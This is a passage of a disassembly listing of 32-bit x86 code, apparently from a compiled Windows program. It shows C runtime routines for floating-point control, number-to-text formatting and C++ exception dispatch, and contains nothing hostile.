sub_41A6A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6B1 proc near ; CODE XREF: sub_415D04+13�p
; sub_415D04+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41A6B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6D4 proc near ; CODE XREF: sub_41A227+1D�p
; sub_41A227+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_41A6EB
fld tbyte_43A738
fistp [ebp+arg_0]
wait
loc_41A6EB: ; CODE XREF: sub_41A6D4+B�j
test cl, 8
jz short loc_41A700
fstsw ax
fld tbyte_43A738
fstp [ebp+var_8]
wait
fstsw ax
loc_41A700: ; CODE XREF: sub_41A6D4+1A�j
test cl, 10h
jz short loc_41A70F
fld tbyte_43A744
fstp [ebp+var_8]
wait
loc_41A70F: ; CODE XREF: sub_41A6D4+2F�j
test cl, 4
jz short loc_41A71D
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41A71D: ; CODE XREF: sub_41A6D4+3E�j
test cl, 20h
jz short locret_41A728
fldpi
fstp [ebp+var_8]
wait
locret_41A728: ; CODE XREF: sub_41A6D4+4C�j
leave
retn
sub_41A6D4 endp
; =============== S U B R O U T I N E =======================================
sub_41A72A proc near ; CODE XREF: sub_415DD3+F�p
push 30000h
push 10000h
call sub_41E0E7
pop ecx
pop ecx
retn
sub_41A72A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A73C proc near ; CODE XREF: sub_41A77A:loc_41A79E�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_4217F0
fstp [ebp+var_8]
fld dbl_4217E8
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_421670
fnstsw ax
sahf
jbe short loc_41A776
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41A776: ; CODE XREF: sub_41A73C+33�j
xor eax, eax
leave
retn
sub_41A73C endp
; =============== S U B R O U T I N E =======================================
sub_41A77A proc near ; CODE XREF: sub_415DD3+5�p
push offset aKernel32 ; "KERNEL32"
call dword_4210C8 ; GetModuleHandleA
test eax, eax
jz short loc_41A79E
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_4210C4 ; GetProcAddress
test eax, eax
jz short loc_41A79E
push 0
call eax ; sub_415DD3
retn
; ---------------------------------------------------------------------------
loc_41A79E: ; CODE XREF: sub_41A77A+D�j
; sub_41A77A+1D�j
jmp sub_41A73C
sub_41A77A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A7A3 proc near ; CODE XREF: sub_417D6C+3CB�p
; DATA XREF: sub_415DEB+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_417033
cmp eax, 65h
pop ecx
jz short loc_41A7E3
loc_41A7B7: ; CODE XREF: sub_41A7A3+3E�j
inc esi
cmp dword_4385FC, 1
jle short loc_41A7D0
movsx eax, byte ptr [esi]
push 4
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_41A7DF
; ---------------------------------------------------------------------------
loc_41A7D0: ; CODE XREF: sub_41A7A3+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_4383F0
mov al, [ecx+eax*2]
and eax, 4
loc_41A7DF: ; CODE XREF: sub_41A7A3+2B�j
test eax, eax
jnz short loc_41A7B7
loc_41A7E3: ; CODE XREF: sub_41A7A3+12�j
mov cl, byte_438600
mov al, [esi]
mov [esi], cl
inc esi
loc_41A7EE: ; CODE XREF: sub_41A7A3+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A7EE
pop esi
retn
sub_41A7A3 endp
; =============== S U B R O U T I N E =======================================
sub_41A7FD proc near ; CODE XREF: sub_417D6C+3E2�p
; DATA XREF: sub_415DEB+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_438600
mov cl, [eax]
test cl, cl
jz short loc_41A819
loc_41A80D: ; CODE XREF: sub_41A7FD+1A�j
cmp cl, dl
jz short loc_41A819
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41A80D
loc_41A819: ; CODE XREF: sub_41A7FD+E�j
; sub_41A7FD+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41A84A
loc_41A820: ; CODE XREF: sub_41A7FD+34�j
mov cl, [eax]
test cl, cl
jz short loc_41A833
cmp cl, 65h
jz short loc_41A833
cmp cl, 45h
jz short loc_41A833
inc eax
jmp short loc_41A820
; ---------------------------------------------------------------------------
loc_41A833: ; CODE XREF: sub_41A7FD+27�j
; sub_41A7FD+2C�j ...
mov ecx, eax
loc_41A835: ; CODE XREF: sub_41A7FD+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41A835
cmp [eax], dl
jnz short loc_41A840
dec eax
loc_41A840: ; CODE XREF: sub_41A7FD+40�j
; sub_41A7FD+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41A840
locret_41A84A: ; CODE XREF: sub_41A7FD+21�j
retn
sub_41A7FD endp
; =============== S U B R O U T I N E =======================================
sub_41A84B proc near ; DATA XREF: sub_415DEB+28�o
; .text:off_43A760�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_4217E0
fnstsw ax
sahf
jb short loc_41A860
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41A860: ; CODE XREF: sub_41A84B+F�j
xor eax, eax
retn
sub_41A84B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A863 proc near ; CODE XREF: sub_41B605+430�p
; DATA XREF: sub_415DEB+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41A88C
lea eax, [ebp+var_8]
push eax
call sub_41E5AA
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41A88C: ; CODE XREF: sub_41A863+C�j
lea eax, [ebp+arg_8]
push eax
call sub_41E5D7
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41A863 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8A1 proc near ; CODE XREF: sub_41AB1E+17�p
; sub_41AB68+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_46BB74, 0
push ebx
push esi
jz short loc_41A8D6
mov ebx, [ebp+arg_8]
mov eax, dword_46BB70
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41ABB9
pop ecx
pop ecx
jmp short loc_41A90E
; ---------------------------------------------------------------------------
loc_41A8D6: ; CODE XREF: sub_41A8A1+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_41E67B
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41E604
add esp, 14h
loc_41A90E: ; CODE XREF: sub_41A8A1+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41A91A
mov byte ptr [eax], 2Dh
inc eax
loc_41A91A: ; CODE XREF: sub_41A8A1+73�j
test ebx, ebx
jle short loc_41A932
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_438600
mov eax, edi
pop edi
mov [eax], cl
loc_41A932: ; CODE XREF: sub_41A8A1+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp byte_46BB74, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_415A20
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41A959
mov byte ptr [ecx], 45h
loc_41A959: ; CODE XREF: sub_41A8A1+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41A99E
mov ebx, [esi+4]
dec ebx
jns short loc_41A96D
neg ebx
mov byte ptr [ecx], 2Dh
loc_41A96D: ; CODE XREF: sub_41A8A1+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41A984
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41A984: ; CODE XREF: sub_41A8A1+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41A99B
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41A99B: ; CODE XREF: sub_41A8A1+E7�j
add [ecx+1], bl
loc_41A99E: ; CODE XREF: sub_41A8A1+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41A8A1 endp
; =============== S U B R O U T I N E =======================================
sub_41A9A5 proc near ; CODE XREF: sub_41AB45+13�p
; sub_41AB68+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_46BB74, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41A9E0
mov eax, dword_46BB78
mov ebx, [esp+10h+arg_8]
mov esi, dword_46BB70
cmp eax, ebx
jnz short loc_41AA10
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41AA10
; ---------------------------------------------------------------------------
loc_41A9E0: ; CODE XREF: sub_41A9A5+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_41E67B
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_41E604
add esp, 14h
loc_41AA10: ; CODE XREF: sub_41A9A5+22�j
; sub_41A9A5+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41AA1E
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41AA1E: ; CODE XREF: sub_41A9A5+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41AA35
push 1
push edi
call sub_41ABB9
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41AA37
; ---------------------------------------------------------------------------
loc_41AA35: ; CODE XREF: sub_41A9A5+7E�j
add edi, eax
loc_41AA37: ; CODE XREF: sub_41A9A5+8E�j
test ebx, ebx
jle short loc_41AA7C
push 1
push edi
call sub_41ABB9
mov al, byte_438600
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41AA7C
cmp byte_46BB74, 0
jz short loc_41AA61
neg esi
jmp short loc_41AA67
; ---------------------------------------------------------------------------
loc_41AA61: ; CODE XREF: sub_41A9A5+B6�j
neg esi
cmp ebx, esi
jl short loc_41AA69
loc_41AA67: ; CODE XREF: sub_41A9A5+BA�j
mov ebx, esi
loc_41AA69: ; CODE XREF: sub_41A9A5+C0�j
push ebx
push edi
call sub_41ABB9
push ebx
push 30h
push edi
call sub_415390
add esp, 14h
loc_41AA7C: ; CODE XREF: sub_41A9A5+94�j
; sub_41A9A5+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41A9A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA83 proc near ; CODE XREF: sub_41AB68+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_41E67B
mov dword_46BB70, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov dword_46BB78, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_41E604
mov eax, dword_46BB70
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp dword_46BB78, ecx
setl cl
mov byte_46BB7C, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov dword_46BB78, eax
jl short loc_41AB09
cmp eax, ebx
jge short loc_41AB09
test cl, cl
jz short loc_41AAFA
loc_41AAF0: ; CODE XREF: sub_41AA83+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41AAF0
and [esi-2], al
loc_41AAFA: ; CODE XREF: sub_41AA83+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41AB45
add esp, 0Ch
jmp short loc_41AB19
; ---------------------------------------------------------------------------
loc_41AB09: ; CODE XREF: sub_41AA83+63�j
; sub_41AA83+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41AB1E
add esp, 10h
loc_41AB19: ; CODE XREF: sub_41AA83+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41AA83 endp
; =============== S U B R O U T I N E =======================================
sub_41AB1E proc near ; CODE XREF: sub_41AA83+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov byte_46BB74, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41A8A1
and byte_46BB74, 0
add esp, 10h
retn
sub_41AB1E endp
; =============== S U B R O U T I N E =======================================
sub_41AB45 proc near ; CODE XREF: sub_41AA83+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov byte_46BB74, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41A9A5
and byte_46BB74, 0
add esp, 0Ch
retn
sub_41AB45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AB68 proc near ; CODE XREF: sub_417D6C+3AA�p
; DATA XREF: sub_415DEB�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41ABA3
cmp [ebp+arg_8], 45h
jz short loc_41ABA3
cmp [ebp+arg_8], 66h
jnz short loc_41AB90
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A9A5
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AB90: ; CODE XREF: sub_41AB68+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AA83
jmp short loc_41ABB4
; ---------------------------------------------------------------------------
loc_41ABA3: ; CODE XREF: sub_41AB68+7�j
; sub_41AB68+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A8A1
loc_41ABB4: ; CODE XREF: sub_41AB68+39�j
add esp, 10h
pop ebp
retn
sub_41AB68 endp
; =============== S U B R O U T I N E =======================================
sub_41ABB9 proc near ; CODE XREF: sub_41A8A1+2C�p
; sub_41A9A5+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41ABDC
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_415B10
inc eax
push eax
push esi
add esi, edi
push esi
call sub_416320
add esp, 10h
pop esi
loc_41ABDC: ; CODE XREF: sub_41ABB9+7�j
pop edi
retn
sub_41ABB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABDE proc near ; CODE XREF: .text:00415FCC�p
; sub_416035+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41ABF4
call sub_41B482
loc_41ABF4: ; CODE XREF: sub_41ABDE+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41AC1C
cmp dword ptr [esi+4], 0
jz short loc_41AC72
cmp [ebp+arg_14], 0
jnz short loc_41AC72
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41AF25
add esp, 10h
jmp short loc_41AC72
; ---------------------------------------------------------------------------
loc_41AC1C: ; CODE XREF: sub_41ABDE+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41AC72
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41AC56
cmp [eax+14h], edi
jbe short loc_41AC56
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41AC56
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41AC75
; ---------------------------------------------------------------------------
loc_41AC56: ; CODE XREF: sub_41ABDE+4A�j
; sub_41ABDE+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41AC79
add esp, 20h
loc_41AC72: ; CODE XREF: sub_41ABDE+23�j
; sub_41ABDE+29�j ...
push 1
pop eax
loc_41AC75: ; CODE XREF: sub_41ABDE+76�j
pop edi
pop esi
pop ebp
retn
sub_41ABDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC79 proc near ; CODE XREF: sub_41ABDE+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41AC99
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41AC9E
loc_41AC99: ; CODE XREF: sub_41AC79+16�j
call sub_41B482
loc_41AC9E: ; CODE XREF: sub_41AC79+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41ADF5
cmp dword ptr [esi+10h], 3
jnz short loc_41AD12
cmp [esi+14h], edi
jnz short loc_41AD12
cmp dword ptr [esi+1Ch], 0
jnz short loc_41AD12
mov esi, dword_46BB80
test esi, esi
jz loc_41ADF0
mov eax, dword_46BB84
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_41E802
pop ecx
test eax, eax
pop ecx
jnz short loc_41ACF4
call sub_41B482
loc_41ACF4: ; CODE XREF: sub_41AC79+74�j
cmp [esi], ebx
jnz loc_41ADF5
cmp dword ptr [esi+10h], 3
jnz short loc_41AD12
cmp [esi+14h], edi
jnz short loc_41AD12
cmp dword ptr [esi+1Ch], 0
jnz short loc_41AD12
call sub_41B482
loc_41AD12: ; CODE XREF: sub_41AC79+41�j
; sub_41AC79+46�j ...
cmp [esi], ebx
jnz loc_41ADF5
cmp dword ptr [esi+10h], 3
jnz loc_41ADF5
cmp [esi+14h], edi
jnz loc_41ADF5
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_416183
add esp, 14h
mov ebx, eax
loc_41AD49: ; CODE XREF: sub_41AC79+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41ADE0
cmp [ebx], edi
jg short loc_41ADD5
cmp edi, [ebx+4]
jg short loc_41ADD5
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41ADD2
loc_41AD6E: ; CODE XREF: sub_41AC79+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41AD9F
loc_41AD80: ; CODE XREF: sub_41AC79+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41AEC8
add esp, 0Ch
test eax, eax
jnz short loc_41ADAE
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41AD80
loc_41AD9F: ; CODE XREF: sub_41AC79+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41AD6E
jmp short loc_41ADD2
; ---------------------------------------------------------------------------
loc_41ADAE: ; CODE XREF: sub_41AC79+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41AFD9
add esp, 2Ch
loc_41ADD2: ; CODE XREF: sub_41AC79+F3�j
; sub_41AC79+133�j
mov edi, [ebp+var_10]
loc_41ADD5: ; CODE XREF: sub_41AC79+DE�j
; sub_41AC79+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41AD49
; ---------------------------------------------------------------------------
loc_41ADE0: ; CODE XREF: sub_41AC79+D6�j
cmp [ebp+arg_14], 0
jz short loc_41ADF0
push 1
push esi
call sub_41B34E
pop ecx
pop ecx
loc_41ADF0: ; CODE XREF: sub_41AC79+56�j
; sub_41AC79+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41ADF5: ; CODE XREF: sub_41AC79+37�j
; sub_41AC79+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41AE1B
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41AE20
add esp, 20h
jmp short loc_41ADF0
; ---------------------------------------------------------------------------
loc_41AE1B: ; CODE XREF: sub_41AC79+180�j
jmp sub_41B42C
sub_41AC79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE20 proc near ; CODE XREF: sub_41AC79+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp dword_46BB88, 0
push esi
push edi
jz short loc_41AE51
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41605A
add esp, 1Ch
test eax, eax
jnz short loc_41AEC4
loc_41AE51: ; CODE XREF: sub_41AE20+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_416183
add esp, 14h
mov esi, eax
loc_41AE6D: ; CODE XREF: sub_41AE20+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_41AEC4
cmp edi, [esi]
jl short loc_41AEBC
cmp edi, [esi+4]
jg short loc_41AEBC
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_41AE96
cmp byte ptr [ecx+8], 0
jnz short loc_41AEBC
loc_41AE96: ; CODE XREF: sub_41AE20+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41AFD9
add esp, 2Ch
loc_41AEBC: ; CODE XREF: sub_41AE20+57�j
; sub_41AE20+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_41AE6D
; ---------------------------------------------------------------------------
loc_41AEC4: ; CODE XREF: sub_41AE20+2F�j
; sub_41AE20+53�j
pop edi
pop esi
leave
retn
sub_41AE20 endp
; =============== S U B R O U T I N E =======================================
sub_41AEC8 proc near ; CODE XREF: sub_41AC79+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_41AF1F
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_41AF1F
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_41AEF9
add ecx, 8
push ecx
push edx
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_41AF1B
loc_41AEF9: ; CODE XREF: sub_41AEC8+1F�j
test byte ptr [esi], 2
jz short loc_41AF03
test byte ptr [edi], 8
jz short loc_41AF1B
loc_41AF03: ; CODE XREF: sub_41AEC8+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_41AF12
test byte ptr [edi], 1
jz short loc_41AF1B
loc_41AF12: ; CODE XREF: sub_41AEC8+43�j
test al, 2
jz short loc_41AF1F
test byte ptr [edi], 2
jnz short loc_41AF1F
loc_41AF1B: ; CODE XREF: sub_41AEC8+2F�j
; sub_41AEC8+39�j ...
xor eax, eax
jmp short loc_41AF22
; ---------------------------------------------------------------------------
loc_41AF1F: ; CODE XREF: sub_41AEC8+B�j
; sub_41AEC8+14�j ...
push 1
pop eax
loc_41AF22: ; CODE XREF: sub_41AEC8+55�j
pop edi
pop esi
retn
sub_41AEC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF25 proc near ; CODE XREF: sub_41ABDE+34�p
; sub_41AFD9+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421828
push offset sub_41D6A4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_41AF57: ; CODE XREF: sub_41AF25+8A�j
cmp esi, [ebp+arg_C]
jz short loc_41AFB1
cmp esi, 0FFFFFFFFh
jle short loc_41AF66
cmp esi, [edi+4]
jl short loc_41AF6B
loc_41AF66: ; CODE XREF: sub_41AF25+3A�j
call sub_41B482
loc_41AF6B: ; CODE XREF: sub_41AF25+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_41AF86
push 103h
push ebx
push eax
call sub_41B3E0
loc_41AF86: ; CODE XREF: sub_41AF25+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41AFA6
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_41AFC3
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_41AFA6: ; CODE XREF: sub_41AF25+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_41AF57
